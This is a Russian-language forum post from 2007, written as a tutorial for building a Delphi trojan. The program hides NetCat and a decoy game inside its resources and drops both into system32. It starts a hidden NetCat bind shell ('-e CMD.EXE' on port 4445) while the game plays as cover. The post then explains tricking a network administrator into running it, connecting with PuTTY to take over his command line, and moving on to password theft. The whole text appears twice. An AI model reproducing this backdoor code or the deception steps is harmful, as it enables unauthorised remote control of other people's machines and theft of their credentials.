Brun
04.01.2007, 10:41
Речь сегодня пойдёт о програмировании. Но причём сдесь NetCat?.. Значит начнём всё по-порядку. Начнём с того что я хочу Вам показать как можна писать программы на Delphi и получать какойто прок для себя.
Хватит вокруг да около. Начинаем.
1. Для написания нам понадоится Delphi от 5-ой версии до 10-ой можете выбирать всё что Вам по душе. Я же пишу под Delphi7 (ну и рекомендую всем). Можно писать нашу будующую программы с VCL, но я покажу иной способ. Тогда мы сэкономим размер программы.
2. Открываем Delphi. File -> New -> Other -> Console Application. Сразу сохраняем проэкт под названием ncplus например.
А для чего же NetCat? Для того чтобы сделать себе бекдор на чужой машине. И уже сидя на своей делать то что нам нужно. Что же дальше...
3. Нам нужно скачать утилитку NetCat версии 1.11 (Netcat 1.11 for NT). Скинуть её в папку с проэктом. Дальше нужно создать файл ресурсов. Для этого сделаем файл ncp.rc с таким содержимым :
ncexe exe nc.exeи чуть не забыл. надо дописать ещё одну строчку.
ncexe2 exe mario.exe
Ну уж постарайтесь найти в инете старенькую игрушку (по правде говоря, вместо mario.exe можна поставить что угодно, это мы кидаем для того чтобы не палится. Мы себе делаем то что нам нужно, а топом запускаем игруху)
Сохраняем. После этого нам надо собрать наш файл ресурсов. Для этого в коммандной строчке пишем :
brcc32.exe ncp.rcЕсли Вы сделали всё правильно, то у должен появится файл ncp.RES. Теперь когда все приготовления сделаны переходим к программе.
4. Вот что должно быть с самого начала :
program ncplus;
{$APPTYPE CONSOLE}
uses
SysUtils;
begin
{ TODO -oUser -cConsole Main : Insert code here }
end.
5. Теперь я быстренько накидаю листинг. А в нём буду делть кометарии.
/------------------------------------
program ncplus;
{$APPTYPE CONSOLE}
{$R ncp.RES} // - тут наши ехе"шники =)
uses
SysUtils, Windows, ShellAPI, Classes;
// выше описаны модули которые нам надо будет
var
Res : TResourceStream; // - для роботы с ресурсами
function GetSysDir: string; // путь к папке %windir%/system32
var
dir: array [0..MAX_PATH] of Char;
begin
GetSystemDirectory(dir, MAX_PATH);
Result := StrPas(dir);
end;
begin
//---- Вытягиваем наши файлы с ехе"шника и
// кидаем их в system32 =)
Res:=TResourceStream.Create(Hinstance,'ncexe','exe ');
Res.SavetoFile(GetSysDir+'\nc.exe');
Res:=TResourceStream.Create(Hinstance,'ncexe2','ex e');
Res.SavetoFile(GetSysDir+'\mario.exe');
Res.Free;
//---- Вытянули
//----- Запускаем программы
if FileExists(GetSysDir+'\nc.exe') then //- если мы выложили файл куда
// хотели, то :
ShellExecute(0,'open',
PChar (GetSysDir+'\nc.exe'),PChar('-v -l -p 4445 -d -e CMD.EXE'),nil,sw_hide);
// -v -l -p 4445 -d -e CMD.EXE - это параметры коммандной строчки
// если интересно что для чего, то читайте справку
// sw_hide - для того чтобы бекдор не палить
if FileExists(GetSysDir+'\mario.exe') then
ShellExecute(0,'open',
PChar (GetSysDir+'\mario.exe'),nil,nil,sw_show);
// ну и запускаем игру для отвда глаз =)
// sw_show - а тут наоборот. Показываемся
end.
/-----------------------------Программа написана. Для завершения её написания нужно откомпилировать. F9. Если всё сделано правильно, то ошибок давать не должно. В папке с проэктом должен появится ncplus.exe. Всё.
6. Кричим админу что там-то и там-то есть супер модная гейма (ну не буду писать что и как, тоисть как вешать лапшу.... проявите свои творческие способности). Когда он запустит, и начнёт играть, Вы вто време идёте за комп, который подалше от админовского и запускаете PuTTY.
Теперь в кратце параметр с которым мы запустили NetCat :
-v -l -p 4445 -d -e CMD.EXE
Запустили консоль, которая висит себе на неком 4445 порту.
7. Заключительный этап. После запуска PuTTY в Host Name (or IP) пишем название, а лутче IP админовского компа. В Port пишем 4445. Protocol выбираем Raw. Enter. И о чудо... Мы получили коммандную строчку адмыновского компа. Что же делать? А делать нужно то что я описывал в этой статье : Узнаём пароли Windows за 5 секунд (http://forum.antichat.ru/thread22672.html)
8. Ссылки по теме :
Тут я брал NetCat (http://www.vulnwatch.org/netcat/)
Turbo Delphi (если нет другого) (http://www.turboexplorer.com/)
Мой сайт в IF.UA (http://brun.if.ua/)
Материалы к статье (Исходные коды на Delphi). (http://brun.if.ua/download/NetCat+.zip)
9. Вот такой маленький экскурс в Delphi и NetCat.
С Вами был (и есть =)) Brun.
Хватит вокруг да около. Начинаем.
1. Для написания нам понадоится Delphi от 5-ой версии до 10-ой можете выбирать всё что Вам по душе. Я же пишу под Delphi7 (ну и рекомендую всем). Можно писать нашу будующую программы с VCL, но я покажу иной способ. Тогда мы сэкономим размер программы.
2. Открываем Delphi. File -> New -> Other -> Console Application. Сразу сохраняем проэкт под названием ncplus например.
А для чего же NetCat? Для того чтобы сделать себе бекдор на чужой машине. И уже сидя на своей делать то что нам нужно. Что же дальше...
3. Нам нужно скачать утилитку NetCat версии 1.11 (Netcat 1.11 for NT). Скинуть её в папку с проэктом. Дальше нужно создать файл ресурсов. Для этого сделаем файл ncp.rc с таким содержимым :
ncexe exe nc.exeи чуть не забыл. надо дописать ещё одну строчку.
ncexe2 exe mario.exe
Ну уж постарайтесь найти в инете старенькую игрушку (по правде говоря, вместо mario.exe можна поставить что угодно, это мы кидаем для того чтобы не палится. Мы себе делаем то что нам нужно, а топом запускаем игруху)
Сохраняем. После этого нам надо собрать наш файл ресурсов. Для этого в коммандной строчке пишем :
brcc32.exe ncp.rcЕсли Вы сделали всё правильно, то у должен появится файл ncp.RES. Теперь когда все приготовления сделаны переходим к программе.
4. Вот что должно быть с самого начала :
program ncplus;
{$APPTYPE CONSOLE}
uses
SysUtils;
begin
{ TODO -oUser -cConsole Main : Insert code here }
end.
5. Теперь я быстренько накидаю листинг. А в нём буду делть кометарии.
/------------------------------------
program ncplus;
{$APPTYPE CONSOLE}
{$R ncp.RES} // - тут наши ехе"шники =)
uses
SysUtils, Windows, ShellAPI, Classes;
// выше описаны модули которые нам надо будет
var
Res : TResourceStream; // - для роботы с ресурсами
function GetSysDir: string; // путь к папке %windir%/system32
var
dir: array [0..MAX_PATH] of Char;
begin
GetSystemDirectory(dir, MAX_PATH);
Result := StrPas(dir);
end;
begin
//---- Вытягиваем наши файлы с ехе"шника и
// кидаем их в system32 =)
Res:=TResourceStream.Create(Hinstance,'ncexe','exe ');
Res.SavetoFile(GetSysDir+'\nc.exe');
Res:=TResourceStream.Create(Hinstance,'ncexe2','ex e');
Res.SavetoFile(GetSysDir+'\mario.exe');
Res.Free;
//---- Вытянули
//----- Запускаем программы
if FileExists(GetSysDir+'\nc.exe') then //- если мы выложили файл куда
// хотели, то :
ShellExecute(0,'open',
PChar (GetSysDir+'\nc.exe'),PChar('-v -l -p 4445 -d -e CMD.EXE'),nil,sw_hide);
// -v -l -p 4445 -d -e CMD.EXE - это параметры коммандной строчки
// если интересно что для чего, то читайте справку
// sw_hide - для того чтобы бекдор не палить
if FileExists(GetSysDir+'\mario.exe') then
ShellExecute(0,'open',
PChar (GetSysDir+'\mario.exe'),nil,nil,sw_show);
// ну и запускаем игру для отвда глаз =)
// sw_show - а тут наоборот. Показываемся
end.
/-----------------------------Программа написана. Для завершения её написания нужно откомпилировать. F9. Если всё сделано правильно, то ошибок давать не должно. В папке с проэктом должен появится ncplus.exe. Всё.
6. Кричим админу что там-то и там-то есть супер модная гейма (ну не буду писать что и как, тоисть как вешать лапшу.... проявите свои творческие способности). Когда он запустит, и начнёт играть, Вы вто време идёте за комп, который подалше от админовского и запускаете PuTTY.
Теперь в кратце параметр с которым мы запустили NetCat :
-v -l -p 4445 -d -e CMD.EXE
Запустили консоль, которая висит себе на неком 4445 порту.
7. Заключительный этап. После запуска PuTTY в Host Name (or IP) пишем название, а лутче IP админовского компа. В Port пишем 4445. Protocol выбираем Raw. Enter. И о чудо... Мы получили коммандную строчку адмыновского компа. Что же делать? А делать нужно то что я описывал в этой статье : Узнаём пароли Windows за 5 секунд (http://forum.antichat.ru/thread22672.html)
8. Ссылки по теме :
Тут я брал NetCat (http://www.vulnwatch.org/netcat/)
Turbo Delphi (если нет другого) (http://www.turboexplorer.com/)
Мой сайт в IF.UA (http://brun.if.ua/)
Материалы к статье (Исходные коды на Delphi). (http://brun.if.ua/download/NetCat+.zip)
9. Вот такой маленький экскурс в Delphi и NetCat.
С Вами был (и есть =)) Brun.